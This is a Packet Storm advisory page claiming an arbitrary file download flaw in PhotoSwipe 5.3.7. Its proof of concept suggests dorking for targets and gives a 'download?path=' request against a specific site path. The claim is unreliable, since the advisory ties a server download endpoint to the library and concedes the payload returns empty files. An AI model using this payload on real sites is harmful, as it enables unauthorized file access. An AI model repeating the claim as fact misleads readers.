PhotoSwipe version 5.3.7 suffers from an arbitrary file download vulnerability.
e3c2913294c88ee858084b60305ca64197b66e6c22651f6ce631126b031fceae===========================================================================================
| # Title : PhotoSwipe 5.3.7 Arbitrary File Download Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) |
| # Vendor : https://photoswipe.com/ |
| # Dork : |
===========================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use Payload : download?path=/uploads/images/support/download/index.php
[+] Payload enables you to download empty files .
[+] https://127.0.0.1/novakon.com.tw/common/frontend/download?path=/uploads/images/support/download/index.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |
|
=======================================================================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed